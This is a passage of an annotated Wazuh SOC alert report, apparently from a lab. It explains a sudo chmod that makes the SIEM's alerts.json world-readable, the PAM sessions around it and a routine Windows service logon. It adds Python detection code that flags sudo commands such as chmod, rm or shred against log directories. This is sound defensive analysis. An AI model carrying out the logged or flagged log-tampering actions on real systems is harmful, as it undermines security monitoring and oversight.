Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:45:13.791511+00:00
Timestamp parsed out of the raw log line – compare with timestamp above to spot ingest lag.

decoder.parent:  sudo
Parent decoder used – for nested parsing.

decoder.name:  sudo
Name of the Wazuh decoder that parsed this raw log.

decoder.ftscomment:  First time user executed the sudo command
'First time seen' (fts) note from the decoder – Wazuh flags the first time this user ran sudo; correlate with the sshd login for the same user just before.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  root
Target user the command ran as – root here, so treat the command field as privileged activity.

data.tty:  pts/0
Terminal the sudo command was issued from – pts/N is a pseudo‑terminal, typical of an interactive or SSH session.

data.pwd:  /home/simba
Working directory when sudo was invoked.

data.command:  /usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json
Full command executed via sudo – read it in full; here it loosens permissions on the Wazuh alerts file, so confirm it was an intended admin action.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:45:14.601+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:14.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
GPG 13 (UK Good Practice Guide 13, protective monitoring) control mapping, like the PCI and NIST tags.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. 000 is the manager itself, so this event happened on the Wazuh server, not on a monitored host.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534714.2389646
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:45:13.795776+00:00 server1 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by simba(uid=1000)
The complete raw log message before parsing. This is the PAM session sudo opened to run the chmod logged 4 ms earlier (22:45:13.791): the same action as the previous alert, not a second login.

predecoder.program_name:  sudo
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:45:13.795776+00:00
Time the host wrote the line; about 0.8 s before the manager's timestamp above, which is normal agent lag.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
Account that opened the session, i.e. the one that ran sudo (simba). Attribute the action to this identity.

data.dstuser:  root(uid=0)
Account the session was opened for, as PAM printed it (root, uid 0). Read together with srcuser: a root session opened by an ordinary account is what every sudo looks like, so the question is whether simba should have sudo at all.

data.uid:  1000
Numeric UID of the invoking user; 1000 is typically the first local account created on a Debian/Ubuntu host. Pairs with the username when the name is missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:45:14.601+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:14.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
GPG 13 (UK Good Practice Guide 13, protective monitoring) control mapping, like the PCI and NIST tags.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. 000 is the manager itself, so this event happened on the Wazuh server, not on a monitored host.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534714.2390097
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:45:13.829022+00:00 server1 sudo: pam_unix(sudo:session): session closed for user root
The complete raw log message before parsing. Closes the sudo session opened 33 ms earlier, so the whole chmod ran inside that window; sudo opens one PAM session per command, so nothing else ran under this elevation.

predecoder.program_name:  sudo
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:45:13.829022+00:00
Time the host wrote the line; compare with timestamp above for agent lag (about 0.8 s here).

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  root
Account whose session ended (root). sudo's close line does not repeat who invoked it, so pair it with the open line by host and time.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions
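
Added example, not code from SOCscribe or Wazuh: it re-parses the three auth.log lines from the sudo and PAM alerts above (the COMMAND line, pam_unix session opened, pam_unix session closed) the way Wazuh's sudo and pam decoders split them, stitches them into one sudo session keyed on host and target user within a short window, and flags commands that change the mode, ownership or contents of the SIEM's own log files. The protected-path prefixes, the set of mutating binaries and the 5 s window are assumptions to tune; the apt line is a constructed benign control, and the sshd logout line from the end of this report is included to show that non-sudo PAM lines are ignored.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Tuple

# auth.log lines in the RFC 3339 form shown in the full_log fields of this report.
# Lines 1-4 are the report's own (sudo COMMAND, pam_unix open, pam_unix close, sshd
# logout); lines 5-7 are a constructed benign sudo for contrast.
SAMPLE_LINES = [
    "2025-04-24T22:45:13.791511+00:00 server1 sudo: simba : TTY=pts/0 ; PWD=/home/simba ; USER=root ; COMMAND=/usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json",
    "2025-04-24T22:45:13.795776+00:00 server1 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by simba(uid=1000)",
    "2025-04-24T22:45:13.829022+00:00 server1 sudo: pam_unix(sudo:session): session closed for user root",
    "2025-04-24T22:47:24.340053+00:00 server1 sshd[3469]: pam_unix(sshd:session): session closed for user simba",
    "2025-04-24T22:50:02.100000+00:00 server1 sudo: simba : TTY=pts/0 ; PWD=/home/simba ; USER=root ; COMMAND=/usr/bin/apt update",
    "2025-04-24T22:50:02.104000+00:00 server1 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by simba(uid=1000)",
    "2025-04-24T22:50:09.300000+00:00 server1 sudo: pam_unix(sudo:session): session closed for user root",
]

# Pre-decoder: timestamp, host, program (optional [pid]), message.
SYSLOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<prog>[^\s:\[]+)(?:\[\d+\])?: (?P<msg>.*)$")
# sudo decoder fields: srcuser, tty, pwd, dstuser, command (PWD with spaces not handled).
SUDO_CMD_RE = re.compile(r"^(?P<srcuser>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<dstuser>\S+) ; COMMAND=(?P<command>.*)$")
# pam decoder fields for session open/close; the "(uid=N)" suffixes are optional.
PAM_OPEN_RE = re.compile(r"^pam_unix\((?P<service>[^:]+):session\): session opened for user (?P<dstuser>[^(\s]+)(?:\(uid=\d+\))? by (?P<srcuser>[^(\s]+)(?:\(uid=\d+\))?$")
PAM_CLOSE_RE = re.compile(r"^pam_unix\((?P<service>[^:]+):session\): session closed for user (?P<dstuser>\S+)$")

# Assumptions to tune per deployment: paths whose modification by sudo is suspicious,
# and binaries that change the mode, ownership or contents of a file.
PROTECTED_PREFIXES = ("/var/ossec/", "/var/log/")
MUTATING_BINARIES = {"chmod", "chown", "chattr", "setfacl", "rm", "truncate", "shred", "mv", "tee", "ln"}
WORLD_READ_SYMBOLIC = re.compile(r"^[ugoa]*[oa][ugoa]*\+[wx]*r[rwx]*$")   # o+r, a+rx, go+r ...


def grants_world_read(mode: str) -> bool:
    """True if a chmod mode argument gives 'other' read access (symbolic or octal)."""
    if mode.isdigit() and len(mode) <= 4:
        return (int(mode[-1]) & 4) == 4
    return WORLD_READ_SYMBOLIC.match(mode) is not None


def tamper_reason(command: str) -> Optional[str]:
    """Explain why a sudo COMMAND looks like log tampering, or None if it does not."""
    argv = command.split()
    if not argv:
        return None
    binary = argv[0].rsplit("/", 1)[-1]
    targets = [a for a in argv[1:] if a.startswith(PROTECTED_PREFIXES)]
    if binary not in MUTATING_BINARIES or not targets:
        return None
    reason = f"{binary} on protected path(s) {', '.join(targets)}"
    modes = [a for a in argv[1:] if a not in targets and not a.startswith("-")]
    if binary == "chmod" and any(grants_world_read(m) for m in modes):
        reason += "; mode grants world read"
    return reason


@dataclass
class SudoSession:
    host: str
    srcuser: str                        # who ran sudo (data.srcuser)
    dstuser: str                        # who the command ran as (data.dstuser)
    tty: str
    pwd: str
    command: str
    issued: datetime                    # time of the sudo COMMAND line
    opened: Optional[datetime] = None   # pam_unix session opened
    closed: Optional[datetime] = None   # pam_unix session closed
    tamper_reason: Optional[str] = None

    @property
    def duration(self) -> Optional[timedelta]:
        return self.closed - self.opened if self.opened and self.closed else None


def correlate(lines: Iterable[str], window: timedelta = timedelta(seconds=5)) -> List[SudoSession]:
    """Stitch sudo COMMAND / session opened / session closed lines into sessions."""
    sessions: List[SudoSession] = []
    pending: Dict[Tuple[str, str], SudoSession] = {}   # (host, dstuser) -> session awaiting PAM lines
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m or m["prog"] != "sudo":               # sshd and other PAM users are not sudo sessions
            continue
        ts, host, msg = datetime.fromisoformat(m["ts"]), m["host"], m["msg"]
        cmd = SUDO_CMD_RE.match(msg)
        if cmd:
            s = SudoSession(host, cmd["srcuser"], cmd["dstuser"], cmd["tty"], cmd["pwd"],
                            cmd["command"], ts, tamper_reason=tamper_reason(cmd["command"]))
            sessions.append(s)
            pending[(host, cmd["dstuser"])] = s
            continue
        opened = PAM_OPEN_RE.match(msg)
        if opened:
            s = pending.get((host, opened["dstuser"]))
            if s and s.opened is None and ts - s.issued <= window:
                s.opened = ts
            continue
        closed = PAM_CLOSE_RE.match(msg)
        if closed:
            s = pending.pop((host, closed["dstuser"]), None)
            if s and s.closed is None:
                s.closed = ts
    return sessions


if __name__ == "__main__":
    for s in correlate(SAMPLE_LINES):
        print(f"{s.issued.isoformat()} {s.srcuser}->{s.dstuser} tty={s.tty} "
              f"dur={s.duration} tamper={s.tamper_reason!r} cmd={s.command!r}")
```

Run it as a script to print one line per session. A session whose tamper_reason is set and whose duration is tens of milliseconds, like the first one, is a single deliberate command rather than an interactive root shell; a chmod that makes alerts.json world-readable should be reverted and the reason for it established with the account owner.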

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:45:57.551+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:57.551+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  63
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
GPG 13 (UK Good Practice Guide 13, protective monitoring) control mapping, like the PCI and NIST tags.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534757.2390482
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Microsoft-Windows-Security-Auditing is the source of all 4xxx audit events in the Security log.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
The provider's GUID; stable across hosts and display languages, so filter on it rather than on the name.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
Schema version of the event template. Newer versions add fields (Elevated Token, Virtual Account and Restricted Admin Mode appear in this one), so a parser keyed on field position needs it.

data.win.system.level:  0
Windows event level: 0 = LogAlways, used by audit events (their success/failure is carried in keywords), 2 = Error, 3 = Warning, 4 = Information.

data.win.system.task:  12544
Task category. In the Security-Auditing provider 12544 is Logon and 12545 is Logoff.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Audit keywords: 0x8020000000000000 is Audit Success, 0x8010000000000000 is Audit Failure. Filter on this rather than on the rendered text.

data.win.system.systemTime:  2025-04-24T22:44:43.8159628Z
When Windows wrote the event (UTC). Here 22:44:43, over a minute before the manager's timestamp, and every Windows event in this report shows the same 72 to 75 s lag, so order Windows events by systemTime or eventRecordID, not by timestamp, before lining them up with the Linux events.

data.win.system.eventRecordID:  43949
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
PID of the process that logged the event (for Security-Auditing events this is normally lsass.exe), not of the process that performed the logon; that one is eventdata.processId below.

data.win.system.threadID:  4968
Thread within that logging process; only useful when matching against ETW traces.

data.win.system.channel:  Security
Which event log the record came from (Security, System, Application, or a Microsoft-Windows-*/Operational log).

data.win.system.computer:  Attacker
Host that recorded the event. For a logon event this is the machine that was accessed, not where the request came from (that is Source Network Address).

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered message text. Everything after "Key Length: 0" is Microsoft's generic description of 4624; the parts that matter (Subject, Logon Type, New Logon, Process Information, Network Information) are already split out into the eventdata fields below, so use those rather than parsing this string.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon (the Subject). S-1-5-18 is the well-known LocalSystem SID.

data.win.eventdata.subjectUserName:  ATTACKER$
Name shown for the Subject. A trailing $ is the computer account, i.e. the OS itself, not a person.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the Subject. WORKGROUP means the host is not domain-joined, so no domain account or Kerberos is involved.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session the request came from. 0x3e7 (999) is the fixed SYSTEM session that exists from boot.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account that was logged on (the New Logon). Same LocalSystem SID as the Subject here.

data.win.eventdata.targetUserName:  SYSTEM
Name of the account logged on. A human account here, with this logon type, is what would make the alert interesting.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the account logged on. NT AUTHORITY is the built-in domain for SYSTEM, LOCAL SERVICE and NETWORK SERVICE.

data.win.eventdata.targetLogonId:  0x3e7
ID of the session created; pivot on it to find the 4672 (special privileges) and 4688 (process creation) events for the same session. Here it is the shared SYSTEM session again.

data.win.eventdata.logonType:  5
Logon type: 2 interactive (console), 3 network (SMB, RPC), 4 batch, 5 service, 7 unlock, 8 network with cleartext password, 9 new credentials (runas /netonly), 10 remote interactive (RDP), 11 cached interactive. Type 5 with SYSTEM as the target and services.exe as the requester is the Service Control Manager starting a service; routine on its own. The Medium label above comes from rule 60106 mapping every 4624 to T1078 (63 hits in this window), not from anything in this event.

data.win.eventdata.logonProcessName:  Advapi
Logon process that handled the request. Advapi means the LogonUser API was called on the local machine (services, scheduled tasks, runas); User32 is the interactive logon UI, NtLmSsp and Kerberos are network logons.

data.win.eventdata.authenticationPackageName:  Negotiate
SSPI package used. Negotiate selects Kerberos or NTLM for network logons; for a local SYSTEM service logon no network authentication took place, so the value carries little information here.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Correlates a Kerberos logon with the matching 4768/4769 event on the domain controller. All zeros means no Kerberos ticket was involved.

data.win.eventdata.keyLength:  0
Length of the session key negotiated for a network logon. 0 means none was requested, as the message itself says, which is normal for a local service logon; it is not a weak-key or downgrade indicator.

data.win.eventdata.processId:  0x304
PID of the process that requested the logon, in hex: 0x304 = 772, which is services.exe (the Service Control Manager) and matches the processID on the 7040 event further down.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Path of that requesting process. services.exe for a type 5 logon is expected; a service logon requested by cmd.exe, powershell.exe or anything under Users or Temp is what to flag.

data.win.eventdata.impersonationLevel:  %%1833
Resource-string placeholder; the rendered message shows %%1833 as Impersonation. How far processes in the new session may impersonate the account (Identification, Impersonation, Delegation).

data.win.eventdata.virtualAccount:  %%1843
%%1843 renders as No: this is not a per-service virtual account (NT SERVICE\name).

data.win.eventdata.targetLinkedLogonId:  0x0
Logon ID of the paired session when UAC splits an administrator logon into an elevated and a filtered token. 0x0 means there is no linked session.

data.win.eventdata.elevatedToken:  %%1842
%%1842 renders as Yes: the new session holds a full, unfiltered administrator token. Expected for SYSTEM; for a human account it means the session has unrestricted admin rights on this host.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
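
Added example, not Wazuh's rule logic: a triage function over the data.win.eventdata fields of a 4624 event, using the logon-type and well-known-SID tables and the %%NNNN placeholders exactly as the rendered message above shows them. The event from this alert is included as is; the RDP event is constructed for contrast. The rules for what counts as worth review are the editor's assumptions and are deliberately simple.

```python
from typing import Dict, List

# Logon types as documented for event 4624.
LOGON_TYPES = {
    2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
    8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
    11: "CachedInteractive",
}
# Well-known SIDs that never belong to a person.
WELL_KNOWN_SIDS = {"S-1-5-18": "SYSTEM", "S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE"}
# %%NNNN placeholders, as the rendered message of the alert above shows them.
RESOURCE_STRINGS = {"%%1833": "Impersonation", "%%1842": "Yes", "%%1843": "No"}
# Source addresses that do not mean "from another host".
LOCAL_SOURCES = {"-", "", "127.0.0.1", "::1"}


def triage_4624(ev: Dict[str, str]) -> Dict[str, object]:
    """Classify one 4624 event (Wazuh data.win.eventdata.* fields) as routine or worth review.

    The review rules below are assumptions for illustration, not Wazuh's.
    """
    logon_type = int(ev.get("logonType", "0"))
    type_name = LOGON_TYPES.get(logon_type, f"type {logon_type}")
    target_sid = ev.get("targetUserSid", "")
    builtin = target_sid in WELL_KNOWN_SIDS
    target = WELL_KNOWN_SIDS.get(target_sid, ev.get("targetUserName", "?"))
    # The decoder doubles backslashes in paths; normalise before comparing.
    process = ev.get("processName", "").replace("\\\\", "\\")
    requesting_pid = int(ev.get("processId", "0x0"), 16)      # eventdata PIDs are hex strings
    src_ip = ev.get("ipAddress", "-")
    elevated = RESOURCE_STRINGS.get(ev.get("elevatedToken", ""), ev.get("elevatedToken", "?"))

    reasons: List[str] = []
    if logon_type in (3, 10) and src_ip not in LOCAL_SOURCES:
        reasons.append(f"{type_name} logon for {target} from {src_ip}")
    if logon_type == 9:
        reasons.append("NewCredentials logon: explicit alternate credentials were supplied")
    if logon_type == 8:
        reasons.append("NetworkCleartext logon: the password reached this host in the clear")
    if elevated == "Yes" and not builtin and logon_type in (2, 10, 11):
        reasons.append(f"full administrator token granted to {target}")
    if logon_type == 5 and builtin and not process.lower().endswith("\\services.exe"):
        reasons.append(f"service logon for {target} requested by {process}, not the Service Control Manager")

    return {
        "verdict": "review" if reasons else "routine",
        "logon_type": type_name,
        "target": target,
        "requesting_process": process,
        "requesting_pid": requesting_pid,
        "source": src_ip,
        "reasons": reasons,
    }


# The event from the alert above, with the field names Wazuh's windows_eventchannel decoder emits.
PAGE_EVENT = {
    "subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$", "subjectLogonId": "0x3e7",
    "targetUserSid": "S-1-5-18", "targetUserName": "SYSTEM", "targetLogonId": "0x3e7",
    "logonType": "5", "logonProcessName": "Advapi", "authenticationPackageName": "Negotiate",
    "processId": "0x304", "processName": r"C:\\Windows\\System32\\services.exe",
    "elevatedToken": "%%1842", "impersonationLevel": "%%1833", "ipAddress": "-",
}
# Constructed contrast case (not from the page): an RDP logon by a local admin from another host.
RDP_EVENT = {
    "subjectUserSid": "S-1-5-18", "subjectUserName": "ATTACKER$", "subjectLogonId": "0x3e7",
    "targetUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1001", "targetUserName": "alice",
    "targetLogonId": "0x5a3c21", "logonType": "10", "logonProcessName": "User32",
    "authenticationPackageName": "Negotiate", "processId": "0x2f0",
    "processName": r"C:\\Windows\\System32\\winlogon.exe", "elevatedToken": "%%1842",
    "impersonationLevel": "%%1833", "ipAddress": "192.168.6.50",
}

if __name__ == "__main__":
    for ev in (PAGE_EVENT, RDP_EVENT):
        print(triage_4624(ev))
```

The page's event comes back routine: a type 5 logon of SYSTEM requested by services.exe (PID 0x304 = 772). The constructed RDP logon comes back for review on two counts, the remote source address and the full administrator token. Whatever rules you settle on, apply them before rule 60106's blanket T1078 label so that service logons stop inheriting a Medium score.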

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:46:59.626+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:46:59.626+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534819.2397819
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
ETW provider. Security-SPP is the Software Protection Platform (Windows activation and licensing); the "Security" in the name has nothing to do with the Security log.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
Provider GUID; stable across hosts and display languages, so filter on this rather than on the name.

data.win.system.eventSourceName:  Software Protection Platform Service
Legacy event-source name for classic (non-manifest) events; the same component as providerName.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
Event template version; 0 for classic events like this one.

data.win.system.level:  4
Windows event level: 4 = Information, 3 = Warning, 2 = Error, 0 = LogAlways (audit events).

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:45:44.7822583Z
When Windows wrote the event (UTC), about 75 s before the manager's timestamp. Every event from this agent shows the same lag, so order Windows events by systemTime or eventRecordID.

data.win.system.eventRecordID:  2421
Incremental log record number – handy for timeline order.

data.win.system.processID:  10660
PID of the process that logged the event (the SPP service host), not of anything it reports on.

data.win.system.threadID:  0
Logging thread; 0 here just means it was not recorded.

data.win.system.channel:  Application
